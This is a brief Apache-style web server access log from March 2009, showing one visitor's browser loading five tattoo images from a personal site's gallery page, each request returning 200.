75.172.216.146 - - [12/Mar/2009:22:04:11 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
75.172.216.146 - - [12/Mar/2009:22:04:11 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
75.172.216.146 - - [12/Mar/2009:22:04:11 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
75.172.216.146 - - [12/Mar/2009:22:04:11 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
75.172.216.146 - - [12/Mar/2009:22:04:12 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
